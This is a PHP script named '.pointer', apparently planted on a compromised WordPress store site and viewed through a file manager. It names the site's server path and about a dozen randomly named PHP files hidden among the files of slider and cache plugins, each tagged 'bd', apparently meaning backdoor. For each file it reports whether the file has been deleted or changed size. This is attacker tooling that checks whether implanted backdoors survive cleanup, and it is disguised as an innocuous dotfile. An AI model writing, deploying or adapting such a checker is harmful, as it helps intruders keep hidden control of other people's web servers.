View file File name : .pointer Content :<?php $r = '/home/ajigenei/store.oduatelecoms.com'; $x = ["/wp-content/plugins/nextend-smart-slider3-pro/Nextend/SmartSlider3/Application/Admin/Layout/Block/Core/ContentSidebar/catpwtext.php"=>"bd@@1039644@@1043", "/wp-content/plugins/nextend-smart-slider3-pro/Nextend/SmartSlider3/Application/Admin/Layout/Block/Slide/LayerWindow/Settings/template_blog.php"=>"bd@@1130825@@896", "/wp-content/plugins/nextend-smart-slider3-pro/Nextend/SmartSlider3/Platform/WordPress/Integration/Unyson/smartslider/shortcodes/smartslider/views/rokcandy.php"=>"bd@@1056586@@997", "/wp-content/plugins/nextend-smart-slider3-pro/Nextend/SmartSlider3/Application/Admin/Layout/Block/Slide/AddLayer/php50x.php"=>"bd@@1130827@@1028", "/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/qapps/2023-11-27/endpoint.2.set.php"=>"bd@@1130829@@1001", "/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/internetmonitor/2021-06-03/endpoint.2.set.php"=>"bd@@1130830@@1019", "/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cleanrooms/2022-02-17/smoke.2.set.php"=>"bd@@1130831@@1034", "/wp-content/plugins/nextend-smart-slider3-pro/Nextend/SmartSlider3/Application/Admin/Layout/Block/Slide/SlideBox/block_mentees.php"=>"bd@@1056594@@938", "/wp-content/plugins/nextend-smart-slider3-pro/Nextend/SmartSlider3/Application/Admin/Layout/Block/Core/TopBarGroup/AccessLib.class.php"=>"bd@@1045099@@984", "/wp-content/plugins/nextend-smart-slider3-pro/Nextend/SmartSlider3/Platform/WordPress/Integration/BeaverBuilder/includes/amazon.php"=>"bd@@1098415@@956", "/wp-content/plugins/nextend-smart-slider3-pro/Nextend/SmartSlider3/Platform/WordPress/Integration/Divi/V31lt/default_elements.php"=>"bd@@1098416@@858", "/wp-content/plugins/revslider/admin/includes/shortcode_generator/divi/includes/modules/RevsliderDivi/images/add_link.php"=>"bd@@1129940@@886", "/wp-content/plugins/nextend-smart-slider3-pro/Nextend/Framework/Translation/WordPress/charsets.php"=>"bd@@1038561@@1007"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');